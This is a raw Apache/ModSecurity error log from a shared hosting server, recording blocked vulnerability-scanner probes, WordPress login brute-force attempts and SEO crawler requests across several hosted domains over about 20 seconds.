[Tue May 26 18:25:44.830663 2026] [security2:error] [pid 983082:tid 983328] [client 20.206.111.238:42490] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/sx_pms.php"] [unique_id "ahWYULvhpIlZJOtze4tg8gAAAPk"]
[Tue May 26 18:25:45.065011 2026] [security2:error] [pid 983082:tid 983327] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYT7vhpIlZJOtze4tg0gAAAPg"]
[Tue May 26 18:25:46.668167 2026] [security2:error] [pid 983082:tid 983312] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYUbvhpIlZJOtze4thAwAAAOk"]
[Tue May 26 18:25:46.694755 2026] [core:crit] [pid 983082:tid 983232] (13)Permission denied: [client 207.46.13.128:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:25:47.884696 2026] [security2:error] [pid 983082:tid 983292] [client 20.206.111.238:43006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-info.php"] [unique_id "ahWYU7vhpIlZJOtze4thLwAAANU"]
[Tue May 26 18:25:47.884839 2026] [security2:error] [pid 983082:tid 983292] [client 20.206.111.238:43006] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-info.php"] [unique_id "ahWYU7vhpIlZJOtze4thLwAAANU"]
[Tue May 26 18:25:49.358385 2026] [security2:error] [pid 983082:tid 983165] [remote 31.24.155.180:45704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYVbvhpIlZJOtze4thSQAAtVI"]
[Tue May 26 18:25:49.961660 2026] [security2:error] [pid 983082:tid 983303] [client 20.206.111.238:43000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-test.php"] [unique_id "ahWYVbvhpIlZJOtze4thXwAAAOA"]
[Tue May 26 18:25:49.961782 2026] [security2:error] [pid 983082:tid 983303] [client 20.206.111.238:43000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-test.php"] [unique_id "ahWYVbvhpIlZJOtze4thXwAAAOA"]
[Tue May 26 18:25:50.168673 2026] [security2:error] [pid 983082:tid 983269] [client 198.244.168.186:52388] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "virgence.com"] [uri "/robots.txt"] [unique_id "ahWYVrvhpIlZJOtze4thZAAAAL4"]
[Tue May 26 18:25:50.168792 2026] [security2:error] [pid 983082:tid 983269] [client 198.244.168.186:52388] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "virgence.com"] [uri "/robots.txt"] [unique_id "ahWYVrvhpIlZJOtze4thZAAAAL4"]
[Tue May 26 18:25:50.252740 2026] [security2:error] [pid 983082:tid 983309] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYVLvhpIlZJOtze4thRQAAAOY"]
[Tue May 26 18:25:50.630810 2026] [security2:error] [pid 983082:tid 983147] [remote 31.24.155.180:45704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYVrvhpIlZJOtze4thZwAA8UA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:25:50.689720 2026] [security2:error] [pid 983082:tid 983292] [client 40.77.167.126:61601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "osmsi.org.in"] [uri "/osmsi-pastranks.php"] [unique_id "ahWYVrvhpIlZJOtze4thaAAAANU"]
[Tue May 26 18:25:51.069681 2026] [security2:error] [pid 983082:tid 983210] [remote 74.7.241.58:49172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWYV7vhpIlZJOtze4thdQAAxH8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:25:51.525731 2026] [security2:error] [pid 983082:tid 983213] [client 54.39.89.66:51930] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "virgence.com"] [uri "/"] [unique_id "ahWYV7vhpIlZJOtze4thfQAAAIY"]
[Tue May 26 18:25:51.525850 2026] [security2:error] [pid 983082:tid 983213] [client 54.39.89.66:51930] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "virgence.com"] [uri "/"] [unique_id "ahWYV7vhpIlZJOtze4thfQAAAIY"]
[Tue May 26 18:25:51.728165 2026] [security2:error] [pid 983082:tid 983306] [client 20.206.111.238:40365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/like.php"] [unique_id "ahWYV7vhpIlZJOtze4thfgAAAOM"]
[Tue May 26 18:25:51.728258 2026] [security2:error] [pid 983082:tid 983306] [client 20.206.111.238:40365] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/like.php"] [unique_id "ahWYV7vhpIlZJOtze4thfgAAAOM"]
[Tue May 26 18:25:52.355110 2026] [security2:error] [pid 983082:tid 983291] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYVrvhpIlZJOtze4thbgAAANQ"]
[Tue May 26 18:25:53.176099 2026] [security2:error] [pid 983082:tid 983085] [remote 49.12.3.147:38994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWYWLvhpIlZJOtze4thjgAAhQI"]
[Tue May 26 18:25:53.372855 2026] [security2:error] [pid 983082:tid 983281] [client 20.206.111.238:42471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/we.php"] [unique_id "ahWYWbvhpIlZJOtze4thmQAAAMo"]
[Tue May 26 18:25:53.372984 2026] [security2:error] [pid 983082:tid 983281] [client 20.206.111.238:42471] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/we.php"] [unique_id "ahWYWbvhpIlZJOtze4thmQAAAMo"]
[Tue May 26 18:25:54.625779 2026] [security2:error] [pid 983082:tid 983122] [remote 173.249.21.166:35560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWYWrvhpIlZJOtze4thsgAAwic"]
[Tue May 26 18:25:55.229873 2026] [security2:error] [pid 983082:tid 983138] [remote 50.6.192.190:32894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWYW7vhpIlZJOtze4thwAAAwzc"]
[Tue May 26 18:25:55.433875 2026] [security2:error] [pid 983082:tid 983157] [remote 49.12.3.147:56890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWYW7vhpIlZJOtze4thyAAAz0o"]
[Tue May 26 18:25:55.526922 2026] [security2:error] [pid 983082:tid 983234] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYWbvhpIlZJOtze4thowAAAJs"]
[Tue May 26 18:25:55.712151 2026] [security2:error] [pid 983082:tid 983262] [client 20.206.111.238:43397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp.php"] [unique_id "ahWYW7vhpIlZJOtze4thzwAAALc"]
[Tue May 26 18:25:55.712253 2026] [security2:error] [pid 983082:tid 983262] [client 20.206.111.238:43397] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp.php"] [unique_id "ahWYW7vhpIlZJOtze4thzwAAALc"]
[Tue May 26 18:25:56.886556 2026] [security2:error] [pid 983082:tid 983208] [remote 50.6.192.190:32894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWYXLvhpIlZJOtze4th2QAAsX0"], referer: https://veganfoodindia.com/wp-login.php
[Tue May 26 18:25:57.592851 2026] [security2:error] [pid 983082:tid 983296] [client 20.206.111.238:43434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-indx.php"] [unique_id "ahWYXbvhpIlZJOtze4th4QAAANk"]
[Tue May 26 18:25:57.593011 2026] [security2:error] [pid 983082:tid 983296] [client 20.206.111.238:43434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-indx.php"] [unique_id "ahWYXbvhpIlZJOtze4th4QAAANk"]
[Tue May 26 18:25:57.760902 2026] [security2:error] [pid 983082:tid 983326] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYW7vhpIlZJOtze4thywAAAPc"]
[Tue May 26 18:25:59.445532 2026] [security2:error] [pid 983082:tid 983304] [client 85.208.96.199:50524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahWYX7vhpIlZJOtze4th_wAAAOE"]
[Tue May 26 18:25:59.445826 2026] [security2:error] [pid 983082:tid 983304] [client 85.208.96.199:50524] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahWYX7vhpIlZJOtze4th_wAAAOE"]
[Tue May 26 18:25:59.604835 2026] [security2:error] [pid 983082:tid 983221] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYXrvhpIlZJOtze4th6wAAAI4"]
[Tue May 26 18:25:59.974870 2026] [security2:error] [pid 983082:tid 983307] [client 20.5.101.115:8399] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "dev.cicodev.org"] [uri "/1.php"] [unique_id "ahWYX7vhpIlZJOtze4tiBwAAAOQ"]
[Tue May 26 18:26:00.044988 2026] [security2:error] [pid 983082:tid 983307] [client 20.5.101.115:8399] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/1.php"] [unique_id "ahWYX7vhpIlZJOtze4tiBwAAAOQ"]
[Tue May 26 18:26:00.296993 2026] [security2:error] [pid 983082:tid 983253] [client 20.206.111.238:40375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/zoo.php"] [unique_id "ahWYYLvhpIlZJOtze4tiCAAAAK4"]
[Tue May 26 18:26:00.297113 2026] [security2:error] [pid 983082:tid 983253] [client 20.206.111.238:40375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/zoo.php"] [unique_id "ahWYYLvhpIlZJOtze4tiCAAAAK4"]
[Tue May 26 18:26:00.702500 2026] [security2:error] [pid 983082:tid 983324] [client 20.5.101.115:2153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/2.php"] [unique_id "ahWYYLvhpIlZJOtze4tiDQAAAPU"]
[Tue May 26 18:26:00.808283 2026] [security2:error] [pid 983082:tid 983205] [remote 94.76.235.103:49456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWYYLvhpIlZJOtze4tiCQAAxHo"]
[Tue May 26 18:26:01.359458 2026] [security2:error] [pid 983082:tid 983258] [client 20.5.101.115:13298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/7.php"] [unique_id "ahWYYbvhpIlZJOtze4tiIQAAALM"]
[Tue May 26 18:26:01.634619 2026] [security2:error] [pid 983082:tid 983246] [client 113.173.201.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYYLvhpIlZJOtze4tiDAAAAKc"]
[Tue May 26 18:26:02.010807 2026] [security2:error] [pid 983082:tid 983302] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYYLvhpIlZJOtze4tiEQAAAN8"]
[Tue May 26 18:26:02.019174 2026] [security2:error] [pid 983082:tid 983315] [client 20.5.101.115:2162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/10.php"] [unique_id "ahWYYrvhpIlZJOtze4tiLAAAAOw"]
[Tue May 26 18:26:02.266598 2026] [security2:error] [pid 983082:tid 983161] [remote 94.76.235.103:49456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWYYrvhpIlZJOtze4tiLQAAxU4"], referer: https://poonawallatennisacademy.moes-art.com/wp-login.php
[Tue May 26 18:26:02.339184 2026] [security2:error] [pid 983082:tid 983277] [client 20.206.111.238:40374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-link-spm.php"] [unique_id "ahWYYrvhpIlZJOtze4tiLgAAAMY"]
[Tue May 26 18:26:02.339321 2026] [security2:error] [pid 983082:tid 983277] [client 20.206.111.238:40374] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-link-spm.php"] [unique_id "ahWYYrvhpIlZJOtze4tiLgAAAMY"]
[Tue May 26 18:26:02.677045 2026] [security2:error] [pid 983082:tid 983237] [client 20.5.101.115:2120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/13.php"] [unique_id "ahWYYrvhpIlZJOtze4tiNQAAAJ4"]
[Tue May 26 18:26:03.334894 2026] [security2:error] [pid 983082:tid 983309] [client 20.5.101.115:2948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/100.php"] [unique_id "ahWYY7vhpIlZJOtze4tiRQAAAOY"]
[Tue May 26 18:26:03.786211 2026] [security2:error] [pid 983082:tid 983097] [remote 167.114.139.27:25048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dgssi.in"] [uri "/robots.txt"] [unique_id "ahWYY7vhpIlZJOtze4tiSQAAsg4"]
[Tue May 26 18:26:03.786415 2026] [security2:error] [pid 983082:tid 983257] [client 167.114.139.27:25048] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dgssi.in"] [uri "/robots.txt"] [unique_id "ahWYY7vhpIlZJOtze4tiSQAAsg4"]
[Tue May 26 18:26:03.858809 2026] [security2:error] [pid 983082:tid 983243] [client 2a03:2880:f806:3e:::0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWYYLvhpIlZJOtze4tiDgAApAU"]
[Tue May 26 18:26:03.991737 2026] [security2:error] [pid 983082:tid 983230] [client 20.5.101.115:10633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/222.php"] [unique_id "ahWYY7vhpIlZJOtze4tiTAAAAJc"]
[Tue May 26 18:26:04.146085 2026] [security2:error] [pid 983082:tid 983281] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYYrvhpIlZJOtze4tiPgAAAMo"]
[Tue May 26 18:26:04.540436 2026] [http2:info] [pid 998632:tid 998632] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:26:04.555836 2026] [security2:error] [pid 998632:tid 998792] [client 20.206.111.238:43455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-link-snpm.php"] [unique_id "ahWYZK1OTU2dW0MS1EmtAAAAAAE"]
[Tue May 26 18:26:04.555983 2026] [security2:error] [pid 998632:tid 998792] [client 20.206.111.238:43455] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-link-snpm.php"] [unique_id "ahWYZK1OTU2dW0MS1EmtAAAAAAE"]
[Tue May 26 18:26:04.774815 2026] [security2:error] [pid 998632:tid 998795] [client 20.5.101.115:2149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/adminfuns.php"] [unique_id "ahWYZK1OTU2dW0MS1EmtEgAAAAQ"]
[Tue May 26 18:26:05.274618 2026] [security2:error] [pid 998632:tid 998652] [remote 142.44.233.136:38942] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "dgssi.in"] [uri "/"] [unique_id "ahWYZa1OTU2dW0MS1EmtGQAAHwE"]
[Tue May 26 18:26:05.274803 2026] [security2:error] [pid 998632:tid 998823] [client 142.44.233.136:38942] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "dgssi.in"] [uri "/"] [unique_id "ahWYZa1OTU2dW0MS1EmtGQAAHwE"]
